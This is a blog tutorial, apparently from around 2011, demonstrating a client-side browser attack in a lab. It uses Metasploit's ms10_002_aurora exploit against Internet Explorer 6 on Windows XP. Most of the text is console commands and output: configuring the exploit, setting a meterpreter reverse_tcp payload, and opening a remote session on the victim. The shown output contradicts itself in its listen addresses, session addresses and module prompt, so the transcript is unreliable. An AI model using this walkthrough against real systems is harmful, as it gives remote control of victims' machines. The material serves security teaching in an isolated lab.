Client Side Attacks
Client side attacks are special types of attacks that mainly target Client Side Applications, eg : Web Browser , Download Client etc. These are Different from Server Side Applications as instead of targeting vulnerabilities in Server Side applications like : Web Server etc. It actually targets the client side application.
For demonstrating this attack we’ll be using the Metasploit Framework and Using one of its basic Client Side Exploit.
Lab Setup
The Lab Consists of a Victim and an Attacker Machine.
Code:
+++++++++++++++++++ +++++++++++++++++++++ + Attacker + ================ + Victim Machine + + + Behind NAT + + +++++++++++++++++++ +++++++++++++++++++++
The Victim Machine is running an Unlatched Windows XP SP1 machine; With Internet Explorer 6 Which is vulnerable to a Client Side Vulnerability.
Attacker
The Attacker’s Machine is running Backtrack 5 with Metasploit Installed.
I am using Virtual Machines to Setup my Lab, and the Network Type is set to NAT.
Now that we have setup our lab let the hacking begin.
Exploitation
First lets open up Metasploit Console , using ‘msfconsole’ :-
Code:
root@bt:~# msfconsole __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 688 exploits - 357 auxiliary - 39 post + -- --=[ 217 payloads - 27 encoders - 8 nops msf >
To use this exploit in Metasploit simple use the ‘use’ command:-
Code:
msf > use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) >
Code:
msf exploit(ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name -- ---- 0 Automatic
Code:
msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf exploit(ms10_002_aurora) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_002_aurora) > set URIPATH / URIPATH => / msf exploit(ms10_002_aurora) >
Now let’s Set some Payload Options:-
Code:
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show options Module options (exploit/windows/browser/ms10_002_aurora): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 127.0.0.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms10_002_aurora) > set LHOST 120.0.0.1 LHOST => 120.0.0.1 msf exploit(ms10_002_aurora) > set LPORT 31337 LPORT => 31337 msf exploit(ms10_002_aurora) >
Now that all is setup, let’s launch the exploit:-
Code:
msf exploit(ms10_002_aurora) > exploit Exploit running as background job. Started reverse handler on 127.0.0.1:31337 Using URL: http://127.0.0.1:80/ Server started.
In this case I’ll use vulnerable IE browser on the Victim Machine to view this site , Now see what happens:-
Code:
Sending stage (723456 bytes) Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514) msf exploit(ie_aurora) > sessions -i 1 Starting interaction with 1... meterpreter > getuid Server username: WINXP\VICTIM
That’s all for this tutorial stay tuned for more.
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon